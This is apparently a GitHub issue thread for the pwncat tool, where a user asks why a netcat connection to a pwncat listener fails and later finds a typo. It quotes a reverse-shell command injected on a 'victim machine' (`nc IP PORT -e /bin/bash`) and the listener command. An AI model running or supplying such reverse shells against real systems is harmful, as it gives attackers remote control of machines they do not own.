### ISSUE TITLE
Netcat Compatibility

### ISSUE THREAD

**Issue by InitRoot** [cytopia/pwncat#61]
Trying to send connection from netcat to pwncat, is that possible?

Victim machine command injection:
 `nc IP PORT -e /bin/bash`

On my attacking machine:
`pwncat -l IP PORT`

It fails with the error whenever a command is run. Connection does get accepted.
`ERROR: Socket OS Error: [Errno 9] Bad file descriptor`

**Comment by cytopia** [comment]
It does work on my machine ;-) It is supposedly 100% compatible (both are just using plain text on top of UDP/TCP). I've tried it with GNU netcat, OpenBSD netcat and also NMAP's ncat.

Can you add a couple of `-vvvvvv` and also your OS and Python version.

**Comment by InitRoot** [comment]
Okay closing it, my own stupidity!
Left out a ' in my shell.
